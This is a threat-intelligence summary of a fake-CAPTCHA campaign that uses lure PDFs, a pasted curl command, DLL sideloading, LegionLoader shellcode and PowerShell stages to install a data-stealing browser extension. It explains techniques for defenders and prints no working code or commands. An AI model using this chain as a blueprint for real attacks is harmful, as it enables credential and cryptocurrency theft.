Fake CAPTCHA Campaign Delivers LegionLoader via Malicious PDFs

Another iteration of fake CAPTCHA prompts was identified in a campaign tracked by Netskope since February 2025, used to distribute the LegionLoader malware to users searching for PDF documents online. Victims are lured by fictitious PDFs that appear in search results, leading them to malicious web pages simulating Cloudflare Turnstile CAPTCHAs. These sites prompt users to enable browser notifications, initiating a tailored infection path depending on the user’s response. If notifications are accepted, the flow continues toward malware delivery; otherwise, users are redirected to benign software downloads. Regarding victimology, Netskope reports that "140 Netskope customers located mainly in North America, Asia, and Southern Europe across different segments, led by the technology and financial services sectors," were affected. The attackers leverage a VMware-signed application to sideload a malicious DLL, ultimately executing LegionLoader and deploying a malicious browser extension.

The attack chain begins with a PDF file containing a link to a Cloudflare CAPTCHA page prompting the user to enable browser notifications. If accepted, the victim is redirected to a set of instructions directing them to open the Windows Run window and execute a command using "curl" to download an MSI file. The attacker’s infrastructure enforces download constraints, as Netskope observed that attempts to access the file via a browser return a message citing service rule violations. Running the MSI registers an application named “Kilo Verfair Tools,” which executes custom installer actions "defined in its CustomActions table." One action launches a legitimate PDF reader to maintain the illusion of legitimacy. Additional actions include sending an HTTP POST request to retrieve a password and executing "logd.bat," which extracts DLLs from a 7-Zip archive and runs a signed binary — "mksSandbox.exe" — to initiate DLL sideloading.

The sideloaded DLL, "libcrypto-1_1-x64.dll," launches LegionLoader via shellcode embedded in the binary. The loader allocates memory and applies a custom deobfuscation algorithm using a runtime-generated key. Techniques like API hammering and math obfuscation are applied to hinder analysis. Once decoded, the shellcode decrypts the LegionLoader payload using XTEA and injects it into a newly spawned "explorer.exe" process through process hollowing. LegionLoader then receives a PowerShell script from its command-and-control server, which constructs the next-stage payload through layered string manipulation, base64 decoding, and XOR decryption. A second PowerShell stage continues this approach, using AES decryption to deliver a payload that installs the malicious browser extension.

The extension is described by Netskope as "a malicious browser extension named ‘Save to Google Drive,’ which looks to imitate the legitimate extension." It is compatible with multiple browsers — Chrome, Edge, Brave, and Opera — and is activated by modifying the Secure Preferences file that stores browser configurations. Its "manifest.json" file includes permissions allowing script execution, clipboard access, system fingerprinting, and collection of browsing data. The extension harvests sensitive information such as cookies, browser history, and Bitcoin transaction data, which is then exfiltrated to attacker-controlled infrastructure. This campaign remains an active threat due to its layered PowerShell payloads, DLL sideloading tactics, and effective use of CAPTCHA-based user interaction.